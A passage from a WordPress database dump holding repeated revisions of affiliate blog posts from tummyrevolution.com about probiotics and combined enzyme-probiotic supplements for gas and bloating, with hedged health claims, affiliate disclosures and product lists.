  3. Enhancing Digestive Function: Probiotics may aid in the digestion of certain substances and the absorption of nutrients.
  4. \n\n\n\n
  5. Modulating the Immune System: There is evidence to suggest that the gut microbiota plays a role in modulating the immune system. Probiotics may contribute to immune system regulation.
  6. \n\n\n\n
  7. Protecting Against Harmful Bacteria: Some probiotic strains produce substances that inhibit the growth of harmful bacteria in the gut, potentially protecting against infections.
  8. \n\n\n\n
  9. Reducing Symptoms of Certain Digestive Conditions: Probiotics have been studied for their potential to alleviate symptoms of various digestive conditions, including irritable bowel syndrome (IBS), inflammatory bowel diseases (such as Crohn\'s disease and ulcerative colitis), and diarrhea.
  10. \n
\n\n\n\n

It\'s important to note that not all probiotics are the same, and different strains may have different effects. Additionally, the effectiveness of probiotics can depend on factors such as the specific health condition, the dosage, and individual variations in response.

\n\n\n\n

Before adding probiotics to your routine or addressing specific health concerns, it\'s advisable to consult with a healthcare professional who can provide personalized advice based on your health status and needs.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Best Multi Probiotics for Men and Women:

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Does probiotic help improve gut health?','','inherit','closed','closed','','5747-revision-v1','','','2023-10-12 08:26:24','2023-10-12 08:26:24','',5747,'https://tummyrevolution.com/?p=5749',0,'revision','',0),(5750,1,'2023-10-12 08:40:52','2023-10-12 08:40:52','\n

Probiotics are live microorganisms that can provide a wide range of health benefits when consumed in adequate amounts. Most famously, they\'re known for promoting a balanced gut microbiome, which is crucial for good digestion and overall well-being.

\n\n\n\n

So, how do these tiny warriors work their magic to combat gas and bloating?

\n\n\n\n
    \n
  1. Balancing the Microbiome: Probiotics introduce beneficial bacteria into your gut, helping to balance the ratio of good to bad microbes. This balance can enhance the efficiency of your digestive system.
  2. \n\n\n\n
  3. Reducing Inflammation: Some probiotic strains have anti-inflammatory properties, which can help soothe an irritated gut and reduce bloating.
  4. \n\n\n\n
  5. Breaking Down Complex Sugars: Certain probiotic strains, such as Lactobacillus and Bifidobacterium, can assist in breaking down complex carbohydrates that might otherwise cause gas and bloating.
  6. \n
\n\n\n\n

Choosing the Right Probiotics

\n\n\n\n

While it\'s tempting to grab the first probiotic supplement you see, it\'s essential to select the right one for your specific needs. Here are some tips:

\n\n\n\n
    \n
  1. Check the Strains: Different probiotic strains have varying effects on digestive health. Look for strains like Lactobacillus and Bifidobacterium, which have shown promise in reducing gas and bloating.
  2. \n\n\n\n
  3. CFUs Matter: Colony-forming units (CFUs) indicate the number of viable bacteria in a probiotic supplement. Consult your healthcare provider for personalised recommendations.
  4. \n\n\n\n
  5. Dietary Sources: Probiotics are also found in fermented foods like yogurt, kefir, sauerkraut, and kimchi. Incorporating these foods into your diet can be a delicious way to support your gut health.
  6. \n
\n\n\n\n

Conclusion: The Promise of Probiotics

\n\n\n\n

While there\'s no one-size-fits-all solution to digestive issues, probiotics offer a promising avenue for relief from gas and bloating. Remember that results may vary from person to person, so it\'s crucial to consult with a healthcare professional before starting any new supplement regimen.

\n\n\n\n

Whether you choose to harness the power of probiotics or explore other avenues for digestive health, remember that a happier gut often leads to a happier you. So, embark on this journey toward digestive bliss, and may your days of discomfort be nothing more than a distant memory. Your gut—and your body—will thank you!

\n\n\n\n

Multi Probiotics to improve your gut and general health:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Probiotics: The Friendly Gut Warriors','','inherit','closed','closed','','5601-revision-v1','','','2023-10-12 08:40:52','2023-10-12 08:40:52','',5601,'https://tummyrevolution.com/?p=5750',0,'revision','',0),(5751,1,'2023-10-12 08:57:28','2023-10-12 08:57:28','\n

Probiotics are live microorganisms that can provide a wide range of health benefits when consumed in adequate amounts. Most famously, they\'re known for promoting a balanced gut microbiome, which is crucial for good digestion and overall well-being.

\n\n\n\n

So, how do these tiny warriors work their magic to combat gas and bloating?

\n\n\n\n
    \n
  1. Balancing the Microbiome: Probiotics introduce beneficial bacteria into your gut, helping to balance the ratio of good to bad microbes. This balance can enhance the efficiency of your digestive system.
  2. \n\n\n\n
  3. Reducing Inflammation: Some probiotic strains have anti-inflammatory properties, which can help soothe an irritated gut and reduce bloating.
  4. \n\n\n\n
  5. Breaking Down Complex Sugars: Certain probiotic strains, such as Lactobacillus and Bifidobacterium, can assist in breaking down complex carbohydrates that might otherwise cause gas and bloating.
  6. \n
\n\n\n\n

Choosing the Right Probiotics

\n\n\n\n

While it\'s tempting to grab the first probiotic supplement you see, it\'s essential to select the right one for your specific needs. Here are some tips:

\n\n\n\n
    \n
  1. Check the Strains: Different probiotic strains have varying effects on digestive health. Look for strains like Lactobacillus and Bifidobacterium, which have shown promise in reducing gas and bloating.
  2. \n\n\n\n
  3. CFUs Matter: Colony-forming units (CFUs) indicate the number of viable bacteria in a probiotic supplement. Consult your healthcare provider for personalised recommendations.
  4. \n\n\n\n
  5. Dietary Sources: Probiotics are also found in fermented foods like yogurt, kefir, sauerkraut, and kimchi. Incorporating these foods into your diet can be a delicious way to support your gut health.
  6. \n
\n\n\n\n

Conclusion: The Promise of Probiotics

\n\n\n\n

While there\'s no one-size-fits-all solution to digestive issues, probiotics offer a promising avenue for relief from gas and bloating. Remember that results may vary from person to person, so it\'s crucial to consult with a healthcare professional before starting any new supplement regimen.

\n\n\n\n

Whether you choose to harness the power of probiotics or explore other avenues for digestive health, remember that a happier gut often leads to a happier you. So, embark on this journey toward digestive bliss, and may your days of discomfort be nothing more than a distant memory. Your gut—and your body—will thank you!

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Multi Probiotics to improve your gut and general health:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Probiotics: The Friendly Gut Warriors','','inherit','closed','closed','','5601-revision-v1','','','2023-10-12 08:57:28','2023-10-12 08:57:28','',5601,'https://tummyrevolution.com/?p=5751',0,'revision','',0),(5752,1,'2023-10-12 08:59:24','2023-10-12 08:59:24','\n

Probiotics are live microorganisms that can provide a wide range of health benefits when consumed in adequate amounts. Most famously, they\'re known for promoting a balanced gut microbiome, which is crucial for good digestion and overall well-being. (SKIP straight to list of Top recommended Probiotics HERE)

\n\n\n\n

So, how do these tiny warriors work their magic to combat gas and bloating?

\n\n\n\n
    \n
  1. Balancing the Microbiome: Probiotics introduce beneficial bacteria into your gut, helping to balance the ratio of good to bad microbes. This balance can enhance the efficiency of your digestive system.
  2. \n\n\n\n
  3. Reducing Inflammation: Some probiotic strains have anti-inflammatory properties, which can help soothe an irritated gut and reduce bloating.
  4. \n\n\n\n
  5. Breaking Down Complex Sugars: Certain probiotic strains, such as Lactobacillus and Bifidobacterium, can assist in breaking down complex carbohydrates that might otherwise cause gas and bloating.
  6. \n
\n\n\n\n

Choosing the Right Probiotics

\n\n\n\n

While it\'s tempting to grab the first probiotic supplement you see, it\'s essential to select the right one for your specific needs. Here are some tips:

\n\n\n\n
    \n
  1. Check the Strains: Different probiotic strains have varying effects on digestive health. Look for strains like Lactobacillus and Bifidobacterium, which have shown promise in reducing gas and bloating.
  2. \n\n\n\n
  3. CFUs Matter: Colony-forming units (CFUs) indicate the number of viable bacteria in a probiotic supplement. Consult your healthcare provider for personalised recommendations.
  4. \n\n\n\n
  5. Dietary Sources: Probiotics are also found in fermented foods like yogurt, kefir, sauerkraut, and kimchi. Incorporating these foods into your diet can be a delicious way to support your gut health.
  6. \n
\n\n\n\n

Conclusion: The Promise of Probiotics

\n\n\n\n

While there\'s no one-size-fits-all solution to digestive issues, probiotics offer a promising avenue for relief from gas and bloating. Remember that results may vary from person to person, so it\'s crucial to consult with a healthcare professional before starting any new supplement regimen.

\n\n\n\n

Whether you choose to harness the power of probiotics or explore other avenues for digestive health, remember that a happier gut often leads to a happier you. So, embark on this journey toward digestive bliss, and may your days of discomfort be nothing more than a distant memory. Your gut—and your body—will thank you!

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Multi Probiotics to improve your gut and general health:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Probiotics: The Friendly Gut Warriors','','inherit','closed','closed','','5601-revision-v1','','','2023-10-12 08:59:24','2023-10-12 08:59:24','',5601,'https://tummyrevolution.com/?p=5752',0,'revision','',0),(5754,1,'2023-10-12 10:09:16','2023-10-12 10:09:16','\n

Enzymes and probiotics are two distinct types of supplements that play different roles in supporting digestive health, but they can complement each other in certain ways. Here are some potential benefits of combining enzymes and probiotic supplements:
(SKIP to top 5 Enzyme & Probiotic supplements HERE)

\n\n\n\n
    \n
  1. Improved Digestive Function:\n
      \n
    • Enzymes: Enzymes help break down food into smaller, more easily digestible molecules. This can aid in the digestion of carbohydrates, proteins, and fats, reducing the burden on the digestive system.
    • \n\n\n\n
    • Probiotics: Probiotics contribute to a healthy balance of gut bacteria, which is essential for efficient digestion. They can help maintain a favorable environment for enzymatic activity.
    • \n
    \n
  2. \n\n\n\n
  3. Enhanced Nutrient Absorption:\n
      \n
    • Enzymes: By breaking down food into smaller components, enzymes may enhance the absorption of nutrients in the small intestine.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome influenced by probiotics may contribute to the absorption of certain nutrients, and they may help produce some vitamins.
    • \n
    \n
  4. \n\n\n\n
  5. Support for Lactose Digestion:\n
      \n
    • Enzymes: Lactase is an enzyme that helps digest lactose, the sugar in milk. Lactase supplements can be beneficial for individuals with lactose intolerance.
    • \n\n\n\n
    • Probiotics: Some probiotic strains, like Lactobacillus acidophilus, produce lactase and may assist in the digestion of lactose.
    • \n
    \n
  6. \n\n\n\n
  7. Immune System Support:\n
      \n
    • Enzymes: Some enzymes may have immune-modulating effects, potentially supporting the immune system indirectly.
    • \n\n\n\n
    • Probiotics: Probiotics can positively influence the immune system by promoting a balanced gut microbiome, which is closely linked to immune function.
    • \n
    \n
  8. \n\n\n\n
  9. Balanced Gut Microbiome:\n
      \n
    • Enzymes: While enzymes primarily focus on breaking down food, they can indirectly contribute to a healthy gut environment by aiding in the efficient digestion and absorption of nutrients.
    • \n\n\n\n
    • Probiotics: These supplements directly introduce beneficial bacteria to the gut, helping to maintain a diverse and balanced microbiome.
    • \n
    \n
  10. \n\n\n\n
  11. Reduced Digestive Discomfort:\n
      \n
    • Enzymes: By facilitating the breakdown of food, enzymes may help reduce bloating, gas, and other discomfort associated with incomplete digestion.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome can contribute to overall gut health and may reduce symptoms of digestive discomfort.
    • \n
    \n
  12. \n
\n\n\n\n

It\'s important to note that individual responses to supplements can vary, and it\'s advisable to consult with a healthcare professional before starting any new supplementation regimen. Additionally, the specific enzymes and probiotic strains, as well as their dosage, can influence the effectiveness of the combination.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Enzyme and Probiotic Supplements 2023:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + Probiotics, 2-in-1 Advanced Formula, Supports Healthy Gut with 9 Different Probiotic Strains

\n\n\n\n\"\"\n\n\n\n

Probiotic & Prebiotic Capsules,Pre & Pro Biotics for Synbiotic Gut Health & Bloating Relief for Women & Men, Enzymes with Probiotics for Digestive Health 

\n\n\n\n\"\"\n\n\n\n

Life Extension Enhanced Super Digestive Enzymes & Probiotics -Vegetarian-Friendly Digestive Health Formula For GI Balance - Plant-Based Diet Aid - Non-GMO

\n\n\n\n\"\"\n','What are the benefits of a combined enzyme and probiotic supplement?','','publish','open','open','','what-are-the-benefits-of-a-combined-enzyme-and-probiotic-supplement','','','2023-10-12 10:09:18','2023-10-12 10:09:18','',0,'https://tummyrevolution.com/?p=5754',0,'post','',0),(5755,1,'2023-10-12 09:20:37','2023-10-12 09:20:37','\n

Enzymes and probiotics are two distinct types of supplements that play different roles in supporting digestive health, but they can complement each other in certain ways. Here are some potential benefits of combining enzymes and probiotic supplements:

\n\n\n\n
    \n
  1. Improved Digestive Function:\n
      \n
    • Enzymes: Enzymes help break down food into smaller, more easily digestible molecules. This can aid in the digestion of carbohydrates, proteins, and fats, reducing the burden on the digestive system.
    • \n\n\n\n
    • Probiotics: Probiotics contribute to a healthy balance of gut bacteria, which is essential for efficient digestion. They can help maintain a favorable environment for enzymatic activity.
    • \n
    \n
  2. \n\n\n\n
  3. Enhanced Nutrient Absorption:\n
      \n
    • Enzymes: By breaking down food into smaller components, enzymes may enhance the absorption of nutrients in the small intestine.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome influenced by probiotics may contribute to the absorption of certain nutrients, and they may help produce some vitamins.
    • \n
    \n
  4. \n\n\n\n
  5. Support for Lactose Digestion:\n
      \n
    • Enzymes: Lactase is an enzyme that helps digest lactose, the sugar in milk. Lactase supplements can be beneficial for individuals with lactose intolerance.
    • \n\n\n\n
    • Probiotics: Some probiotic strains, like Lactobacillus acidophilus, produce lactase and may assist in the digestion of lactose.
    • \n
    \n
  6. \n\n\n\n
  7. Immune System Support:\n
      \n
    • Enzymes: Some enzymes may have immune-modulating effects, potentially supporting the immune system indirectly.
    • \n\n\n\n
    • Probiotics: Probiotics can positively influence the immune system by promoting a balanced gut microbiome, which is closely linked to immune function.
    • \n
    \n
  8. \n\n\n\n
  9. Balanced Gut Microbiome:\n
      \n
    • Enzymes: While enzymes primarily focus on breaking down food, they can indirectly contribute to a healthy gut environment by aiding in the efficient digestion and absorption of nutrients.
    • \n\n\n\n
    • Probiotics: These supplements directly introduce beneficial bacteria to the gut, helping to maintain a diverse and balanced microbiome.
    • \n
    \n
  10. \n\n\n\n
  11. Reduced Digestive Discomfort:\n
      \n
    • Enzymes: By facilitating the breakdown of food, enzymes may help reduce bloating, gas, and other discomfort associated with incomplete digestion.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome can contribute to overall gut health and may reduce symptoms of digestive discomfort.
    • \n
    \n
  12. \n
\n\n\n\n

It\'s important to note that individual responses to supplements can vary, and it\'s advisable to consult with a healthcare professional before starting any new supplementation regimen. Additionally, the specific enzymes and probiotic strains, as well as their dosage, can influence the effectiveness of the combination.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top Enzyme and Probiotic Supplements:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n','What are the benefits of a combined enzyme and probiotic supplement?','','inherit','closed','closed','','5754-revision-v1','','','2023-10-12 09:20:37','2023-10-12 09:20:37','',5754,'https://tummyrevolution.com/?p=5755',0,'revision','',0),(5756,1,'2023-10-12 09:23:13','2023-10-12 09:23:13','\n

Enzymes and probiotics are two distinct types of supplements that play different roles in supporting digestive health, but they can complement each other in certain ways. Here are some potential benefits of combining enzymes and probiotic supplements:

\n\n\n\n
    \n
  1. Improved Digestive Function:\n
      \n
    • Enzymes: Enzymes help break down food into smaller, more easily digestible molecules. This can aid in the digestion of carbohydrates, proteins, and fats, reducing the burden on the digestive system.
    • \n\n\n\n
    • Probiotics: Probiotics contribute to a healthy balance of gut bacteria, which is essential for efficient digestion. They can help maintain a favorable environment for enzymatic activity.
    • \n
    \n
  2. \n\n\n\n
  3. Enhanced Nutrient Absorption:\n
      \n
    • Enzymes: By breaking down food into smaller components, enzymes may enhance the absorption of nutrients in the small intestine.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome influenced by probiotics may contribute to the absorption of certain nutrients, and they may help produce some vitamins.
    • \n
    \n
  4. \n\n\n\n
  5. Support for Lactose Digestion:\n
      \n
    • Enzymes: Lactase is an enzyme that helps digest lactose, the sugar in milk. Lactase supplements can be beneficial for individuals with lactose intolerance.
    • \n\n\n\n
    • Probiotics: Some probiotic strains, like Lactobacillus acidophilus, produce lactase and may assist in the digestion of lactose.
    • \n
    \n
  6. \n\n\n\n
  7. Immune System Support:\n
      \n
    • Enzymes: Some enzymes may have immune-modulating effects, potentially supporting the immune system indirectly.
    • \n\n\n\n
    • Probiotics: Probiotics can positively influence the immune system by promoting a balanced gut microbiome, which is closely linked to immune function.
    • \n
    \n
  8. \n\n\n\n
  9. Balanced Gut Microbiome:\n
      \n
    • Enzymes: While enzymes primarily focus on breaking down food, they can indirectly contribute to a healthy gut environment by aiding in the efficient digestion and absorption of nutrients.
    • \n\n\n\n
    • Probiotics: These supplements directly introduce beneficial bacteria to the gut, helping to maintain a diverse and balanced microbiome.
    • \n
    \n
  10. \n\n\n\n
  11. Reduced Digestive Discomfort:\n
      \n
    • Enzymes: By facilitating the breakdown of food, enzymes may help reduce bloating, gas, and other discomfort associated with incomplete digestion.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome can contribute to overall gut health and may reduce symptoms of digestive discomfort.
    • \n
    \n
  12. \n
\n\n\n\n

It\'s important to note that individual responses to supplements can vary, and it\'s advisable to consult with a healthcare professional before starting any new supplementation regimen. Additionally, the specific enzymes and probiotic strains, as well as their dosage, can influence the effectiveness of the combination.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top Enzyme and Probiotic Supplements:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n','What are the benefits of a combined enzyme and probiotic supplement?','','inherit','closed','closed','','5754-revision-v1','','','2023-10-12 09:23:13','2023-10-12 09:23:13','',5754,'https://tummyrevolution.com/?p=5756',0,'revision','',0),(5757,1,'2023-10-12 09:38:22','2023-10-12 09:38:22','\n

Enzymes and probiotics are two distinct types of supplements that play different roles in supporting digestive health, but they can complement each other in certain ways. Here are some potential benefits of combining enzymes and probiotic supplements:

\n\n\n\n
    \n
  1. Improved Digestive Function:\n
      \n
    • Enzymes: Enzymes help break down food into smaller, more easily digestible molecules. This can aid in the digestion of carbohydrates, proteins, and fats, reducing the burden on the digestive system.
    • \n\n\n\n
    • Probiotics: Probiotics contribute to a healthy balance of gut bacteria, which is essential for efficient digestion. They can help maintain a favorable environment for enzymatic activity.
    • \n
    \n
  2. \n\n\n\n
  3. Enhanced Nutrient Absorption:\n
      \n
    • Enzymes: By breaking down food into smaller components, enzymes may enhance the absorption of nutrients in the small intestine.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome influenced by probiotics may contribute to the absorption of certain nutrients, and they may help produce some vitamins.
    • \n
    \n
  4. \n\n\n\n
  5. Support for Lactose Digestion:\n
      \n
    • Enzymes: Lactase is an enzyme that helps digest lactose, the sugar in milk. Lactase supplements can be beneficial for individuals with lactose intolerance.
    • \n\n\n\n
    • Probiotics: Some probiotic strains, like Lactobacillus acidophilus, produce lactase and may assist in the digestion of lactose.
    • \n
    \n
  6. \n\n\n\n
  7. Immune System Support:\n
      \n
    • Enzymes: Some enzymes may have immune-modulating effects, potentially supporting the immune system indirectly.
    • \n\n\n\n
    • Probiotics: Probiotics can positively influence the immune system by promoting a balanced gut microbiome, which is closely linked to immune function.
    • \n
    \n
  8. \n\n\n\n
  9. Balanced Gut Microbiome:\n
      \n
    • Enzymes: While enzymes primarily focus on breaking down food, they can indirectly contribute to a healthy gut environment by aiding in the efficient digestion and absorption of nutrients.
    • \n\n\n\n
    • Probiotics: These supplements directly introduce beneficial bacteria to the gut, helping to maintain a diverse and balanced microbiome.
    • \n
    \n
  10. \n\n\n\n
  11. Reduced Digestive Discomfort:\n
      \n
    • Enzymes: By facilitating the breakdown of food, enzymes may help reduce bloating, gas, and other discomfort associated with incomplete digestion.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome can contribute to overall gut health and may reduce symptoms of digestive discomfort.
    • \n
    \n
  12. \n
\n\n\n\n

It\'s important to note that individual responses to supplements can vary, and it\'s advisable to consult with a healthcare professional before starting any new supplementation regimen. Additionally, the specific enzymes and probiotic strains, as well as their dosage, can influence the effectiveness of the combination.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top Enzyme and Probiotic Supplements:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + Probiotics, 2-in-1 Advanced Formula, Supports Healthy Gut with 9 Different Probiotic Strains

\n\n\n\n\"\"\n','What are the benefits of a combined enzyme and probiotic supplement?','','inherit','closed','closed','','5754-revision-v1','','','2023-10-12 09:38:22','2023-10-12 09:38:22','',5754,'https://tummyrevolution.com/?p=5757',0,'revision','',0),(5758,1,'2023-10-12 09:54:47','2023-10-12 09:54:47','\n

Enzymes and probiotics are two distinct types of supplements that play different roles in supporting digestive health, but they can complement each other in certain ways. Here are some potential benefits of combining enzymes and probiotic supplements:
(SKIP to top 5 Enzyme & Probiotic supplements HERE)

\n\n\n\n
    \n
  1. Improved Digestive Function:\n
      \n
    • Enzymes: Enzymes help break down food into smaller, more easily digestible molecules. This can aid in the digestion of carbohydrates, proteins, and fats, reducing the burden on the digestive system.
    • \n\n\n\n
    • Probiotics: Probiotics contribute to a healthy balance of gut bacteria, which is essential for efficient digestion. They can help maintain a favorable environment for enzymatic activity.
    • \n
    \n
  2. \n\n\n\n
  3. Enhanced Nutrient Absorption:\n
      \n
    • Enzymes: By breaking down food into smaller components, enzymes may enhance the absorption of nutrients in the small intestine.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome influenced by probiotics may contribute to the absorption of certain nutrients, and they may help produce some vitamins.
    • \n
    \n
  4. \n\n\n\n
  5. Support for Lactose Digestion:\n
      \n
    • Enzymes: Lactase is an enzyme that helps digest lactose, the sugar in milk. Lactase supplements can be beneficial for individuals with lactose intolerance.
    • \n\n\n\n
    • Probiotics: Some probiotic strains, like Lactobacillus acidophilus, produce lactase and may assist in the digestion of lactose.
    • \n
    \n
  6. \n\n\n\n
  7. Immune System Support:\n
      \n
    • Enzymes: Some enzymes may have immune-modulating effects, potentially supporting the immune system indirectly.
    • \n\n\n\n
    • Probiotics: Probiotics can positively influence the immune system by promoting a balanced gut microbiome, which is closely linked to immune function.
    • \n
    \n
  8. \n\n\n\n
  9. Balanced Gut Microbiome:\n
      \n
    • Enzymes: While enzymes primarily focus on breaking down food, they can indirectly contribute to a healthy gut environment by aiding in the efficient digestion and absorption of nutrients.
    • \n\n\n\n
    • Probiotics: These supplements directly introduce beneficial bacteria to the gut, helping to maintain a diverse and balanced microbiome.
    • \n
    \n
  10. \n\n\n\n
  11. Reduced Digestive Discomfort:\n
      \n
    • Enzymes: By facilitating the breakdown of food, enzymes may help reduce bloating, gas, and other discomfort associated with incomplete digestion.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome can contribute to overall gut health and may reduce symptoms of digestive discomfort.
    • \n
    \n
  12. \n
\n\n\n\n

It\'s important to note that individual responses to supplements can vary, and it\'s advisable to consult with a healthcare professional before starting any new supplementation regimen. Additionally, the specific enzymes and probiotic strains, as well as their dosage, can influence the effectiveness of the combination.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top Enzyme and Probiotic Supplements:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + Probiotics, 2-in-1 Advanced Formula, Supports Healthy Gut with 9 Different Probiotic Strains

\n\n\n\n\"\"\n\n\n\n

Probiotic & Prebiotic Capsules,Pre & Pro Biotics for Synbiotic Gut Health & Bloating Relief for Women & Men, Enzymes with Probiotics for Digestive Health 

\n\n\n\n\"\"\n\n\n\n

Life Extension Enhanced Super Digestive Enzymes & Probiotics -Vegetarian-Friendly Digestive Health Formula For GI Balance - Plant-Based Diet Aid - Non-GMO

\n\n\n\n\"\"\n','What are the benefits of a combined enzyme and probiotic supplement?','','inherit','closed','closed','','5754-revision-v1','','','2023-10-12 09:54:47','2023-10-12 09:54:47','',5754,'https://tummyrevolution.com/?p=5758',0,'revision','',0),(5759,1,'2023-10-12 10:01:50','2023-10-12 10:01:50','Top 5 combined enzymes and probiotics supplements','Enzymes and Probiotics supplements','Why should you take Enzymes and Probiotics','inherit','open','closed','','christina-victoria-craft-whsnkiwwpec-unsplash','','','2023-10-12 10:06:28','2023-10-12 10:06:28','',5754,'http://tummyrevolution.com/wp-content/uploads/2023/10/christina-victoria-craft-WHSnkIwWpec-unsplash.jpg',0,'attachment','image/jpeg',0),(5760,1,'2023-10-12 10:04:12','2023-10-12 10:04:12','top 5 Gut health Supplements - Probiotics and Enzymes combined','Gut heath supplements','Enzymes and Probiotic Supplements\n','inherit','open','closed','','lilartsy-zsno9mhkxpu-unsplash','','','2023-10-12 10:24:55','2023-10-12 10:24:55','',5754,'http://tummyrevolution.com/wp-content/uploads/2023/10/lilartsy-ZsNO9MhKXPU-unsplash.jpg',0,'attachment','image/jpeg',0),(5761,1,'2023-10-12 10:04:21','2023-10-12 